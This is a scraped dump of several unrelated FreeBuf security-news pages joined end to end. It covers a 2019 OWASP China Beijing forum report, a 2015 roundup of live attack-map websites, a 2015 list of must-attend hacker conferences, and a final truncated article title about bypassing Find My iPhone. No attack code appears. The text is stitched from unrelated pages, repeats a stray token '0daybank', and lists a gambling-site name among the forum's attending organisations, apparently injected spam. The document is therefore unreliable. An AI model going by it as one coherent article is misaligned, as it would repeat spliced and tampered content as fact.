已结束

本站由阿里云 提供计算与安全服务

官方QQ群:590717869

用户服务有奖投稿申请专栏提交漏洞参与众测商城企业服务甲方会员厂商会员企业空间企业SRC漏洞众测智能安全合作信息寻求报道广告投放联系我们友情链接关于我们关于我们加入我们
微信公众号
新浪微博赞助商
FreeBuf+小程序
扫码把安全装进口袋

斗象科技FreeBuf漏洞盒子斗象智能安全平台免责条款协议条款Copyright ? 2020 WWW.FREEBUF.COM All Rights Reserved 沪公网安备 31011502009321号
css.php正在加载中…0daybank

owasp

FB招聘站
分类阅读
专栏
公开课
企业服务
用户服务
手机版
搜索
投稿
登录
注册
OWASP 2019首届信息安全论坛北京站成功举办FB客服认证作者2019-01-21共54312人围观活动
2019年1月12日,OWASP中国北京区域安全论坛暨2019首届北京企业信息安全建设沙龙于北京民族园智选酒店成功举办。

会议回顾
本次沙龙设立了三个议题和一个大咖面对面公开讨论环节,通过大家的提问和交流,现在大部分企业单位的问题还是停留在怎么选好人、怎么选好工具、怎么设定好的流程,安全人在企业的价值和自我定位,工具怎么用好,怎么用在合适的场景,流程的落地问题,就以上问题一一给各位做了解答,无论是OWASP中国副主席王颉的企业安全建设还是漏洞盒子的SRC运营,还是来自安恒信息的比较热门的S-SDLC的最佳实践,给各位嘉宾提供了较好的参考。OWASP中国北京分会负责人张坤从主动和被动两个维度分析了企业信息安全的价值体现和整体推动效果,从合规驱动和事件驱动分析了信息安全人员和团体的价值体现和自我定位,针对嘉宾对安全组织架构的困惑,也借鉴国外成熟信息安全组织架构分析了国内安全的成长过程和发展方向。
image.png

本次北京论坛,参会人员近200人,座无虚席。本次沙龙以“企业信息安全建设”为主题,围绕企业信息安全建设、S-SDLC的实施、SRC的搭建和运营、数据安全、企业安全部门的价值和定位等热点话题展开激烈讨论和交流。

微信图片_20190118183051.png

来自各行各业的企业信息技术负责人、信息安全专家以及各种安全团队、安全研究机构的人员参与了本次沙龙。

参会企业、机构包括:

中央电视台、毕马威、朝阳网安、公安部一所、公安部十五所、瓜子二手车、国泰君安、国网电力、海尔、华夏银行、借贷宝、澳门金沙导航、拉勾网、联通、神州优车、神州租车、首钢、顺丰商业、途游、小米、阳光保险、宜人贷、宜信、亿联银行、光大银行、中国海油、中国科学院、中国网安、中铁等等。

image.pngimage.png

通过会议讨论和交流,可以看出,信息安全已经在各行各业中开始得到重视,企业信息安全建设已经普及并日趋完善。

主题分享
OWASP,以开源的方式支撑企业应用安全体系化建设
OWASP 中国副主席 王颉

针对国外应用安全行业有关“把安全左移”的发声和国内安全行业重视S-SDLC和DevSecOps的落地实践机遇,王颉博士从S-SDLC的角度分享了企业开展应用安全体系建设的思路与方法;并从人员意识培训、流程实践落地、工具应用三个维度,介绍了企业在软件安全开发相关环节中能直接从OWASP社区获得的成熟项目及每个项目的价值。

image.png

全生命周期开发安全的旧瓶与新酒

安恒信息安全研究员 杨廷锋

整个议题首先从乙方传统交付的全生命周期开发安全切入,总结了在服务过程中遇到的难闭环、难接受、投入大、数据化低的问题,以及所导致的方案难落地问题。之后通过对目前的软件开发领域的DevOps技术革命以及DevSecOps技术理念进行介绍分析,总结出优化全生命周期开发安全的交付方案的思路。思路基本上从工具化、自动化、数据化、流水线化、基线化五个角度,结合开发人员体验去优化整体方案。

image.png

企业SRC如何赢在起跑线
漏洞盒子SRC产品负责人 来勇

企业安全建设在经过了防火墙,渗透测试,红蓝对抗等等方案后,企业SRC凭着测试灵活,成本低,见效快的特点迅速被各行业的企业所接受。如何让企业创建的SRC能够以良性健康的形式开展,我们分享了SRC系统的基本组成部分,SRC运营的基本方式方法。通过简单易懂的方法论,让企业在安全建设的道路上起步更见稳健。

15476069831069.png

大咖面对面
大咖面对面环节,通过征集和投票选取了三个议题进行了激烈讨论和问答,分别是:

1.企业信息安全的定位和价值;

2.企业信息安全的运营;

3.数据安全。

OWASP中国副主席王颉、OWASP中国北京分会负责人张坤、墨迹天气信息安全总监王真、马拉西亚HITB全能黑客金福,四位大咖对以上议题进行了分析和讨论,并一一解答了十数位嘉宾的数十个问题,其中包括企业信息安全组织架构问题、信息安全人员的自我驱动、信息安全部门和人员的价值体现、信息安全运营难题、和公司内部的沟通和协调、数据安全的痛点、数据安全的分类分级做法等。

本次创新环节,改变了传统议题的讲师说和圆桌会议的讲师互相说的局面,把话筒交给听众,为到场嘉宾解答身边的问题。

image.png

image.png

本次活动召集人、OWASP中国北京区域负责人张坤表示,此次从结果来看凝聚了北京区域信息安全人员,推进产业升级中的企业信息安全建设转型升级。

OWASP中国有关负责人也表示,2019年OWASP中国会继续加大力度,推进各个区域的活动开展,为会员提供更多交流分享的平台。

时值新年,会议主办方owasp中国、安恒信息、漏洞盒子为到场嘉宾准备了大量礼品,包括一等奖一名、二等奖两名、三等奖三名、提问奖品十二名、抽奖十二名、与会人员奖品百份等共一百三十余份礼品。

image.png

image.png

资料分享
关于本次大会议题分享资料,遵循本次大会嘉宾意见,放出部分演讲PPT,详情请扫码查看。

微信图片_20190117142737.jpg

更多精彩# OWASP# 安全沙龙
FB客服
FB客服
447 篇文章
等级: 9级
||
相关推荐

OWASP中国·北京分会2019首届信息安全沙龙

热烈祝贺2019OWASP中国吉林区域安全沙龙成功举办

OWASP中国吉林区域安全沙龙即将召开

EISS-2018企业信息安全峰会 | 11月30日.上海

闭门议题前瞻 | 红蓝对抗,甲方的矛与盾

EISS-2019企业信息安全峰会丨3月29日·北京

EISS-2018企业信息安全峰会上海站11月30日成功举办

EISS-2018企业信息安全峰会将于北京举办

昵称
请输入昵称
必须您当前尚未登录。登录?注册邮箱
请输入邮箱地址
必须(保密)表情插图
有人回复时邮件通知我
FB客服
FB客服认证作者

FreeBuf官方客服

447
文章数
501
评论数
15
关注者

关注
最近文章
白帽公开课|CTF中Web各种题目的解题姿势
2020.03.27

斗象科技春招来了!安全行业Top创业公司&前景福利双赢的offer不香吗?
2020.03.27

白帽公开课|纯实战化攻防教学:玩转白帽子操作系统Blackarch
2020.03.25

浏览更多
文章目录

会议回顾
主题分享
OWASP,以开源的方式支撑企业应用安全体系化建设
企业SRC如何赢在起跑线
大咖面对面
资料分享
相关阅读
OWASP Benchmark的搭建和使用OWASP Juice Shop:专用于安全技能训练的OWASP靶场(含演示视频)OWASP Juice Shop题解(一)Hacking-Lab top 10系列教程热烈祝贺2019OWASP中国吉林区域安全沙龙成功举办
推荐关注

官方公众号

聚焦企业安全

官方QQ群 FreeBuf官方微博
文章目录

会议回顾
主题分享
OWASP,以开源的方式支撑企业应用安全体系化建设
企业SRC如何赢在起跑线
大咖面对面
资料分享
活动预告
3月

纯实战化攻防教学 | 玩转黑客操作系统Blackarch
已结束
3月

合规、技术、实践,从隐私保护走向数据安全
已结束
3月

冠军选手帮你把CTF知识点各个击破
已结束
3月

CTF之web安全入门
已结束

本站由阿里云 提供计算与安全服务

官方QQ群:590717869

用户服务有奖投稿申请专栏提交漏洞参与众测商城企业服务甲方会员厂商会员企业空间企业SRC漏洞众测智能安全合作信息寻求报道广告投放联系我们友情链接关于我们关于我们加入我们
微信公众号
新浪微博赞助商
FreeBuf+小程序
扫码把安全装进口袋

斗象科技FreeBuf漏洞盒子斗象智能安全平台免责条款协议条款Copyright ? 2020 WWW.FREEBUF.COM All Rights Reserved 沪公网安备 31011502009321号
css.php正在加载中…0daybank

网络攻击

FB招聘站
分类阅读
专栏
公开课
企业服务
用户服务
手机版
搜索
投稿
登录
注册
“世界大战”尽在掌控:盘点全球网络攻击实时追踪系统凌晨几度i认证作者2015-01-21金币奖励+15共4910887人围观 ,发现 25 个不明物体其他头条
关注网络安全,关注FreeBuf的小伙伴们每天都在关注着世界上每时每刻都在发生的网络攻击事件。也许你很难想象全球范围内所有攻击活动进行时的壮观场景,也很难了解网络攻击和攻击背后的组织是怎样的……那么本文将带你一览无余。

FreeBuf科普:攻击数据从何而来?

这是一些很形象、生动、有趣的攻击可视化记录。所有在地图上展示的大数据都是来自真实的生活目标、“蜜罐”和安全公司部署的“诱饵系统”收集的数据,其中有攻击来源、攻击方式以及攻击频率。

此外,地图中显示破坏系统的“攻击方”组织通常是从别的某个地方发起的,也就是说你所看到的“攻击源”很可能只是攻击者的一个攻击“跳板”,并非真实发起地,真正幕后攻击者会用多重伪造技术,隐藏的很深。

FireEye公司“网络威胁地图”

直接上图,下面的“网络威胁地图”讲述的就是一个真实故事,是FireEye曾透露的某黑客组织对零售商和它们的信用卡系统发起的网络攻击!此时你脑海会想起什么呢?一定会想起洲际导弹导弹!没错,还记得1984年的《战争游戏》中出现的北美防空司令部的监视器画面吗?!地图上并没有太多的原始数据,但是看起来的确很有趣有木有!

10.png

FireEye的“网络威胁地图”

穿越:https://www.fireeye.com/cyber-map/threat-map.html

挪威公司的IPViking地图:Eye candy-addictive

下面一幅来自挪威公司的IPViking地图更有炫酷了,它包含每个相关攻击的丰富数据,比如攻击组织名称和网络地址,攻击目标所在城市、被攻击的服务器。还列举出最容易受攻击的国家,和最喜欢发起攻击的国家(细心的读者会发现,天朝与米国常常各登榜首,小编想这并不公平,或许另有目的…)

11.png

挪威的IPViking攻击地图:Eye candy-addictive

穿越:http://map.ipviking.com/

来自Arbor Networks由全球270个ISPs匿名分享流量的“数字攻击地图”

另一个有趣的,包含大量攻击信息的追踪系统当属Arbor Networks的“数字攻击地图”。地图中的数据来源于美联储,其中的网络攻击流量都是由全球270多个ISP客户统计并同意匿名分享的。这个服务提供商可真是提供了真正实用的服务啊,因为它可以帮你及时追查先前的网络攻击,最早可追溯到2013年的6月!

12.png

来自Arbor networks的由全球270个ISPs匿名分享流量的“数字攻击地图”

穿越:http://www.digitalattackmap.com/

最像视频游戏的卡巴斯基(Kaspersky)“网络实时地图”

卡巴斯基的“网络实时地图”还有更好玩的地方,与其他系统相比,它最像一个交互式视频游戏了。你所看到的千变万化的数据是由卡巴斯基实验室各种扫描服务器提供的,因此,这也具有了一定灵活性,你可以布局自定义扫描,过滤某些恶意威胁,如E-mail恶意软件,Web site攻击、漏洞扫描等等。

13.png

最像视频游戏的卡巴斯基(Kaspersky)的“网络实时地图”

穿越:https://cybermap.kaspersky.com/

Anubis Networks的Cyberfeed带你巡视全球恶意软件感染现状

它使用类似谷歌地球的表现形式,地图数据是来自已知的著名恶软件家族,它展示更多是恶意软件感染地图,而不像网络攻击地图,也不是十分互动的。在这一方面,它很像芬兰公司的f-secure,趋势科技的“全球僵尸网络威胁活动地图”和Team Cymru的“网络恶意活动地图”(下面都有介绍)。

05.png

Anubis Networks的Cyberfeed带你进行巡视全球的恶意软件感染现状

穿越:https://www.anubisnetworks.com/products/threat-intelligence/

Team Cymru的“网络恶意活动地图”

这张地图也有电影版本的,你可以下载下面的格式:

H.264/MPEG-4 (~2MB)
Windows Media (~7MB)
MPEG-2 (~2MB)
电影版本连同下面的图片每天都更新。

08.jpg

穿越:http://www.team-cymru.org/Monitoring/Malevolence/maps.html
电影版本:http://www.team-cymru.org/visualizations/compromised_map/recent.wmv

趋势科技“全球僵尸网络威胁活动地图”

09.png

穿越:http://apac.trendmicro.com/apac/security-intelligence/current-threat-activity/global-botnet-map/

蜜网项目(Honeynet Project)“蜜蜂地图(Honey Map)”

蜜网项目(Honeynet Project)的“蜜蜂地图”,它看起来不是超级”性感”,但是它的实时威胁蜜罐系统的里含有相当数量的有用信息,其中就包含Virustotal对每一个威胁和攻击中恶意软件分析的链接。

06.png

蜜网项目(Honeynet Project)的“蜜蜂地图(Honey Map)”

穿越:http://map.honeynet.org/

OpenDNS实验室作品

此外再加一个OpenDNS实验伙伴们“绘制”的一个图文并茂的网络攻击追踪地图。

07.png

OpenDNS全球网络概览

穿越:http://labs.opendns.com/global-network/

Nexusguard Hubble更闪亮

13.jpg

闪亮动态地图From hubble.nexusguard.com

穿越:http://hubble.nexusguard.com/

[参考信息来源Here,由FreeBuf小编/凌晨几度i编辑,转载须注明来自FreeBuf黑客与极客专栏文章(FreeBuf.COM)]

凌晨几度i
凌晨几度i
39 篇文章
等级: 6级
||
相关推荐

你家路由器“有趣”的24小时:路由器真的安全吗?(含视频)

一周海外安全事件回顾(2014.03.10–2014.03.16)

针对爱尔兰DDoS攻击的取证分析

“红遍全球”的恶意软件Mirai,你所需要知道的那些事

VirusTotal Graph增加新特性,查看各文件的相关性将更加容易

海湾局势再度告急,伊朗炼油厂大火,疑似为网络攻击“复仇”反击

【RSA2017专题】盘点RSA 2017展台上的那些威胁情报产品

美国怀疑伊朗发起了一连串网络攻击

这些评论亮了

H2nn4p回复
做得不错,可以用来拍电影。
因为,
毕竟,
谁会在攻击的时候,
不用跳板,
呢?
)34(亮了

davie80(3级)回复
好牛逼的既视感
)17(亮了

Bill回复
@ 谭晓生 都是有数据的,后台读取或取的数据,传给前端,前端做交互。这里面大部分是具备实时监控能力的大公司,只是有可能数据不是最新的,但是不会是模拟数据,因为地图是都是读取的json地图包,模拟数据的话,落点会不确定,会有很多打到海上。
)10(亮了

freebuffzck(5级)回复
卡巴斯基的最帅!
)10(亮了

谭晓生回复
FireEye的亲测就是js动画,根本没有实时数据,只能用来意淫
其他的估计也差不多
这种东西只能用来装13
)8(亮了
发表评论已有 25 条评论

LJokerP (4级)来世愿做友人A 2015-01-21回复1楼
火钳刘明

强势占座

亮了(4)

davie80 (3级) 2015-01-21回复2楼
好牛逼的既视感

亮了(17)

sky 2015-01-21回复3楼
牛逼的视觉盛宴

亮了(4)

Fiend520 (7级) 2015-01-21回复4楼
网络不好,看着和打马赛克是的哈哈

亮了(3)

D之国度 (1级)快樂每從辛苦得,便宜多自噄虧来。 2015-01-21回复
@ Fiend520 挪威公司的IPViking地图比较流畅!!!

亮了(2)

freebuffzck (5级) 2015-01-21回复5楼
卡巴斯基的最帅!

亮了(10)

paidir (1级) 2015-01-21回复6楼
视觉效果很高端

亮了(3)

Rechange (6级)关注网络安全、智能硬件 2015-01-21回复7楼
好酷炫 ?

亮了(3)

花如雪 2015-01-21回复8楼
好像LINUX有这种动态的桌面插件和壁纸吧,求~~

亮了(2)

mtfeng (1级) 2015-01-21回复9楼
其实,我比较好奇的是,即使这些数据是一些组织或安全公司以蜜罐的技术来实现收集的,但是应该也是部分的吧?并不能代表真实互联网的实际攻击流量.

亮了(4)

路人丙 2015-01-21回复10楼
一直都以为IPViking只是动画 装13用的 汗

亮了(4)

huachishi (3级) 2015-01-21回复11楼
好久不见这位牛逼的作者了,一回归就这么酷炫 ?

亮了(5)

flowind 2015-01-21回复12楼
这视觉冲击有点炫….

亮了(3)

華 (1级) 2015-01-21回复13楼
炫。。。

亮了(2)

SHIELD-SKY (1级) 2015-01-21回复14楼
太酷了。。。

亮了(2)

谭晓生 2015-01-22回复15楼
FireEye的亲测就是js动画,根本没有实时数据,只能用来意淫

其他的估计也差不多

这种东西只能用来装13

亮了(8)

Bill 2016-02-18回复
@ 谭晓生 都是有数据的,后台读取或取的数据,传给前端,前端做交互。这里面大部分是具备实时监控能力的大公司,只是有可能数据不是最新的,但是不会是模拟数据,因为地图是都是读取的json地图包,模拟数据的话,落点会不确定,会有很多打到海上。

亮了(10)

秋天的毛栗子 2015-01-22回复16楼
situation awareness//: 转发微博

亮了(2)

囚于心56831 2015-01-22回复17楼
很牛

亮了(3)

Asiaidc.net 2015-01-23回复18楼
很牛的文字与视觉盛宴,非常全面,与大家分享了.

亮了(4)

王凯旗 2015-08-05回复19楼
我的天

亮了(1)

zoonctrl (6级)该怎么做好信息安全? 2015-11-12回复20楼
好好玩的样子

亮了(3)

H2nn4p 2015-12-11回复21楼
做得不错,可以用来拍电影。

因为,

毕竟,

谁会在攻击的时候,

不用跳板,

呢?

亮了(34)

零御 (1级) 2017-08-13回复22楼
完全没用,现在小学生都知道,开虚拟机,跳到太平洋了。谁特么不用跳板。

亮了(0)

attack 2017-08-22回复23楼
2017.08.22 attack on cyber

亮了(1)
昵称
请输入昵称
必须您当前尚未登录。登录?注册邮箱
请输入邮箱地址
必须(保密)表情插图
有人回复时邮件通知我
凌晨几度i
凌晨几度i认证作者

FB作者

39
文章数
185
评论数
1
关注者

关注
最近文章
汽车安全:汽车黑客手册(电子书下载)
2015.02.09

“世界大战”尽在掌控:盘点全球网络攻击实时追踪系统
2015.01.21

涨姿势:如何让你的Google账户更安全
2014.11.19

浏览更多
相关阅读
[细节剖析]X Windows中一个22年的漏洞安全难寻一隅之地,飞上天照样能黑你浅谈开源威胁情报工具和技术卡巴斯基:Duqu 2.0病毒使用的数字证书窃取自富士康2019年第四季度DDoS攻击报告
推荐关注

官方公众号

聚焦企业安全

官方QQ群 FreeBuf官方微博
文章目录

活动预告
3月

纯实战化攻防教学 | 玩转黑客操作系统Blackarch
已结束
3月

合规、技术、实践,从隐私保护走向数据安全
已结束
3月

冠军选手帮你把CTF知识点各个击破
已结束
3月

CTF之web安全入门
已结束

本站由阿里云 提供计算与安全服务

官方QQ群:590717869

用户服务有奖投稿申请专栏提交漏洞参与众测商城企业服务甲方会员厂商会员企业空间企业SRC漏洞众测智能安全合作信息寻求报道广告投放联系我们友情链接关于我们关于我们加入我们
微信公众号
新浪微博赞助商
FreeBuf+小程序
扫码把安全装进口袋

斗象科技FreeBuf漏洞盒子斗象智能安全平台免责条款协议条款Copyright ? 2020 WWW.FREEBUF.COM All Rights Reserved 沪公网安备 31011502009321号
css.php正在加载中…0daybank

世界黑客大会

FB招聘站
分类阅读
专栏
公开课
企业服务
用户服务
手机版
搜索
投稿
登录
注册
全球十大必去的黑客大会fber2015-08-04金币奖励+8共717943人围观 ,发现 14 个不明物体头条资讯

9.png

DEF CON概述

99.png

由绰号为“Dark Tangent(黑暗切线)”的黑客Jeff Moss创办,是世界上最知名的“黑客大会”。 DEF CON每年在美国内华达州的拉斯维加斯举行,第一届DEF CON在1993年6月举办,因此它也是最古老的网络安全会议之一。

DEF CON名称源自军事上的“战备状态(Defense Condition)”的缩写,作为一个会议的名称,“Con”也可解读为“Conference(会议)”。此外,很多DEF CON小组的早期成员都是盗打电话破解者,他们喜欢的“DEF”也是电话键盘数字“3”上面印着的字母。

参加DEF CON的理由

吸引了世界上最好的网络安全研究人员和黑客参与,他们的兴趣在软件、计算机架构、硬件修改,以及任何可以被“破解或攻破”的东西。DEF CON的参会者大都非常友好且平易近人。

如果你是一个“黑客”,那么DEF CON不会让人失望。有大量的事情可以做。多个track的演讲聚集了优秀的演讲者,黑客相关的东西也有展示,例如,无线网络破解,撬锁,入侵无人机和夺旗竞赛。

DEF CON也非常的社交化。晚上有现场音乐表演,你可以交朋友,到处闲逛的同时学习安全知识,包括如何破解它们,这就是大会为你准备的。当然如果你喜欢在沙漠里玩射击,这也是去参会的一个理由。

最近的会议日期

日期:August 6 – 9, 2015

会议标题:DEF CON 23

地点:Paris/ Bally’s, Las Vegas, United States

日期:August 4 – 7, 2016

会议标题:DEF CON 24

日期:July 27 – 30, 2017

会议标题:DEF CON 25

ShmooCon概述

999.png

ShmooCon是一个非常流行的“清教徒”黑客大会。由SHMOO Group始创于1990年代后期,如果你有兴趣遇见网络安全领域的一些聪明人,这是一个“必须参加”的会议。你可能不知道,SHMOO Group背后的项目包括Linux Apache,PGP,OpenSSL和Snort!每年的门票销售都是秒杀,是因为很多的IT安全人员都想去。

参加ShmooCon的理由

它充满了惊人的黑客内容,通常有40场不同的讲座和演示关于各种IT安全话题,包括密码学、计算机安全如ShellCode,还有独特的schmoocon活动,如Shmooganography。

是什么让ShmooCon如此受欢迎?是演讲的质量,主办方花了很多精力在选择演讲者,演讲议题没有在其他会议讲过。

门票很便宜,只要150美元。 DEF CON是大约250美元。此外,主办方限制参会人数保证会议好管理,而不是铺天盖地的来一堆人。

最近的会议日期

日期:January 16 – 18, 2015

会议标题:ShmooCon

地点:Washington, DC, United States

ToorCon概述

1.png

ToorCon(”Root”倒过来写)是另一个美国西海岸的会议,在1999年圣地亚哥2600的用户群之后,这个黑客大会被命名。ToorCon做的事情有所不同,他们组织训练营甚至全世界巡回! ToorCon通过在非常棒的场地举办会议立即与其他会议区别开,比如2009年在华盛顿州东部废弃的导弹发射井举办ToorCamp,他们的WorldToor 2013是在南极洲的游轮上。Toorcamp是仿照欧洲黑客训练营为蓝本的。

参加ToorCon的理由

ToorCon的名誉是“深思熟虑的”聚集了最多400人一起参与动手讲座和演示,他们将演讲者及其个性融合的很好,比如Hacker Hotshots的Joe Grand和Hak5的Darren Kitchen。

ToorCon是一个开始你网络安全职业生涯的地方。我们建议你参与ToorCamp去结识安全社区里的其他人,你的简历如果有ToorCamp字样,如果你遇到合适的面试官,会让他产生你是“我们中的一个”的模糊感觉。

最近的会议日期

日期:October 21 – 25, 2015

会议标题:ToorCon

其中:San Diego, CA, United States

OWASP概述

11.png

开放Web应用安全项目(简写为OWASP)是一个为了提高软件的安全性,不以营利为目的的组织。有一个主要的OWASP APPSEC会议在美国旧金山,是推荐的。

参加OWASP的理由

如果你从事应用程序安全性(开发人员,程序员等)工作,参加OWASP会议是必须的。OWASP演讲和演示文稿最贴近Web应用安全内容。显然,编写安全的代码是应用程序防止数据被窃取,提高整体安全性很重要的一部分。你可以从OWASP会议中学习安全编码等重要的技能,这将最终帮助你与你的职业生涯进步。

最近的会议日期

日期:September 22 – 23, 2015

会议标题:OWASP AppSecUSA

地点:San Francisco, United States

RSA概述

111.png

不包含RSA的“全球十大必去黑客大会”是不完整的。RSA是“必须去”的包含大量安全厂商的会议,虽然有某些厌恶参加RSA的骨灰级网络文化元素,但毫无疑问,这是达成网络安全生意的地方。

RSA大会开始作为一个密码学的会议,但后来演变成一个更广泛的信息安全会议,分为厂商展览和演讲议题两大部分。

参加RSA的理由

提升你的网络安全职业!每一个主要的安全厂商,你能想到的会在那里,你如果有生意要做,或者寻找一份工作,这可能是你想参加的最好的网络安全会议。

如果你是网络安全的新人,在RSA这么大型的安全会议上,可以帮你找到自己的方向和定位。

最近的会议日期

日期:November 4 – 5, 2015

会议标题:RSA Conference Abu Dhabi

地点:Emirates Palace, Abu Dhabi, UAE

日期:February 29 – March 4, 2016

会议标题:RSA Conference USA

地点:Moscone Center, San Francisco, United States

THOTCON概述

1111.png

这个会议或许不是那么有名,但我们喜欢它足以把它列入我们的名单。这是一个在美国芝加哥的经典黑客(网络文化)会议,我们认为是很棒的。 THOTCON是一个非营利、有趣的、门票很便宜的非商业会议。

参加THOTCON的理由

门票非常实惠,每次都是飞快的销售一空。2016年的提示:学生价56.00美元,优惠期注册:106.00美元!

有很棒的演讲。如果你是一个安全的书呆子,你一定会喜欢他们演讲的质量和深度。如果你在芝加哥地区从事网络安全工作,这显然是一个“必须去”的会议。

最近的会议日期

日期:May 5 – 6, 2016

会议标题:THOTCON 0×7

地点:Chicago, United States

Black Hat概述

5.png

可以认为黑帽大会是DEF CON的商业版本,两个会议都是Jeff Moss所创立(黑帽大会已被出售)。黑帽大会具有全球的吸引力,其参会者比较“企业、公司化”,而大量的DEF CON参会者则更加“街头化”和“黑客化”。

黑帽大会有两个部分:黑帽培训,和黑帽简报(Black Hat Briefings,演讲)。网络安全培训是所有安全会议的重点,黑帽作为世界上最大的IT安全会议,培训更是被突出强调的。

参加Black Hat的理由

这是必须的。黑帽和DEF CON对于大多数网络安全的专业人士是一种“通行权(rights-of-passage)”,必须出席此会议是名望,信誉和全方位的满意度在提醒自己,你在最酷的行业工作。

如果你第一次听到什么事,那么你是在黑帽大会听到的。黑帽被誉为第一时间了解网络安全圈“突发新闻”的地方,特别是关于“严重问题”的安全漏洞。

最近的会议日期

日期:August 1 – 6, 2015

会议标题:Black Hat | USA

地点:Mandalay Bay, Las Vegas, United States

日期:November 10 – 13, 2015

会议标题:Black Hat | Europe

地点:Amsterdam, The Netherlands

TROOPERS概述

55.png

TROOPERS是德国的信息安全会议,它有一个良好的声誉作为欧洲有洞察力的黑客会议之一。主办方总能吸引一些世界上最优秀的头脑来演讲,他们看起来具有很棒的无忧无虑的精神。用他们自己的话说:“我们是Troopers(骑兵),不需要其它信条。这是一个团结的口号。如果你站起来应对日常的IT安全挑战,你就是骑兵!”。

TROOPERS在2007年就决定了方向,他们不会允许“平常的产品/供应商展示和销售”,相反,他们只是寻求更纯粹的网络安全技术议题。这太好了!

参加TROOPERS的理由

你可以接触到欧洲网络安全圈子的重量级人物。来自一些最大的和最坏的高科技公司有影响力的首席信息安全官,IT审计师,网络安全系统管理员,安全顾问等人都会出现。

海德堡(会议举办城市)是美丽的。在欧洲生活了很长的时间的我看来,海德堡在巴伐利亚地区是欧洲最令人惊叹的地方之一。

最近的会议日期

日期:March 14 – 18, 2016

会议标题:TROOPERS16

地点:Heidelberg, Germany

Nuit du Hack概述

555.png

我们喜欢这个会议是因为它有自己的优势,自从2003年在巴黎召开以来,被称为Hackerz Voice的黑客团体所影响,他们亦受到DEF CON的启发。

参加Nuit du Hack的理由

这是一个非常注重实践的会议,如果你是真正意义上的“黑客”,你会爱上它。Nuit du Hack是法国最古老的地下黑客会议之一,聚集了安全专业人员和任何级别的业余爱好者到一个地方,以测试他们的技能。有一堆的资源适合每一个人,他们甚至有小孩玩的环节,也有一个非常活跃的CTF比赛。

他们已经有了一个黑客职位公告板!我们爱这个。Nuit du Hack的兄弟们给参会者搞了一个安全工作的门户网站(https://yeswehack.com/),这是一个伟大的想法。

最近的会议日期

日期:June 20 – 21, 2015

会议标题:Nuit du Hack 2015

地点:Paris, France

B-Sides概述

5555.png

B-Sides不是某一个具体的会议,而是安全会议的全球运动。每个B-Sides会议基于社区驱动的理念,志愿者聚在一起讨论技术和安全问题。每年有数以百计的B-Sides会议发生在世界各地,我们强烈建议你参与进来。

参加B-Sides的理由

不像有些上面列出的会议可能会非常昂贵,他们通常是免费的!

他们是无处不在,如果你住在大城市,肯定能够找到一个B-Sides会议发生在您附近。

最近的会议日期(有数百!)

会议标题:Global B-Sides Events!

地点:全球!

原文评论中有人提到“不敢相信你居然忘记了“Chaos Communication Congress(CCC)”,作者表示感谢:“CCC绝对是最古老的黑客会议之一,将来会加进来。”

* 作者:辛巴达,参考来源concise-courses,sec-un,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

fber
37 篇文章
等级: 6级
||
相关推荐

【FreeBuf年货】2017年你不能错过的13场海外顶级信息安全峰会

DEF CON China 究竟值不值得一看?

13个有用的渗透测试资源博客

2018年美国RSA大会报名超详细攻略

FreeBuf独家专访HITCON创办人:来自台湾的骇客精神

安全技术人与政策制定者,如何才能跨过交流鸿沟?

DEF CON CHINA 1.0早鸟票3月11日开售,艺术作品征集启动

DEFCON China:不用办签证出国,在国内就能参加的全球知名黑客大Party是什么体验?

这些评论亮了

stonedeyy(1级)回复
全球十大必去的黑客大会,一个都去不了
)20(亮了
发表评论已有 14 条评论

stonedeyy (1级) 2015-08-04回复1楼
全球十大必去的黑客大会,一个都去不了

亮了(20)

专治不服 2015-08-04回复2楼
全是特么各种CON

亮了(4)

shentouceshi (4级)http://www.cnblogs.com/SEC-fsq… 2015-09-06回复
@ 专治不服 全是各种坑

亮了(1)

Rechange (6级)关注网络安全、智能硬件 2015-08-04回复3楼
? 其实也是一篇软文

亮了(3)

Fiend520 (7级) 2015-08-04回复4楼
没钱有个卵用呀哎

亮了(4)

科技大当家 2015-08-04回复5楼
找虐呀

亮了(0)

01iw 2015-08-04回复6楼
怎么办我想要罗莉con

亮了(0)

mialuz (1级) 2015-08-04回复7楼
高大上啊。。。。

亮了(0)

Soindigo (1级)Up to the moon 2015-08-04回复8楼
啧啧 然并卵

亮了(0)

blackeagle (3级)向FreeBuf致敬 2015-08-04回复9楼
我大360的ISC居然没进全球TOP 10,太桑心了。

亮了(5)

上铺的哥 2015-08-04回复10楼
现在就剩一个问题了……

亮了(0)

langyajiekou (6级) 2015-08-05回复
@ 上铺的哥 哥,不止一个问题。。。

亮了(1)

笑呵呵 (1级) 2015-08-05回复11楼
一个都没去过

亮了(1)

g0ttl (1级) 2017-05-15回复12楼
去打扫卫生啊

亮了(1)
昵称
请输入昵称
必须您当前尚未登录。登录?注册邮箱
请输入邮箱地址
必须(保密)表情插图
有人回复时邮件通知我

fber

这家伙太懒,还未填写个人描述!

37
文章数
3
评论数
0
关注者

关注
最近文章
安全圈向上看:殿堂级黑客大咖降临i春秋,放出烧脑挑战等你揭秘
2016.03.15

[推广]网站排名一直上不去?赛门铁克帮您提高百度排名
2015.08.18

调查问卷:斯诺登应该被赦无罪吗?
2015.08.14

浏览更多
相关阅读
VxWorks Fuzzing 之道:VxWorks 工控实时操作系统漏洞挖掘调试与利用揭秘腾讯都认错了,我们还在忍受哪些诱导推广行为?谷歌和火狐浏览器将不再信任中国CNNIC数字证书白帽子兴趣消退:“泥泞中”的苹果漏洞赏金计划Liftoh木马钓鱼邮件正在进行时
推荐关注

官方公众号

聚焦企业安全

官方QQ群 FreeBuf官方微博
文章目录

活动预告
3月

纯实战化攻防教学 | 玩转黑客操作系统Blackarch
已结束
3月

合规、技术、实践,从隐私保护走向数据安全
已结束
3月

冠军选手帮你把CTF知识点各个击破
已结束
3月

CTF之web安全入门
已结束

本站由阿里云 提供计算与安全服务

官方QQ群:590717869

用户服务有奖投稿申请专栏提交漏洞参与众测商城企业服务甲方会员厂商会员企业空间企业SRC漏洞众测智能安全合作信息寻求报道广告投放联系我们友情链接关于我们关于我们加入我们
微信公众号
新浪微博赞助商
FreeBuf+小程序
扫码把安全装进口袋

斗象科技FreeBuf漏洞盒子斗象智能安全平台免责条款协议条款Copyright ? 2020 WWW.FREEBUF.COM All Rights Reserved 沪公网安备 31011502009321号
css.php正在加载中…0daybank

私人dns

FB招聘站
分类阅读
专栏
公开课
企业服务
用户服务
手机版
搜索
投稿
登录
注册
利用私有DNS,“查找我的 iPhone”可被轻松绕过Sphinx专栏作者2016-06-01金币奖励+8共364712人围观 ,发现 23 个不明物体终端安全
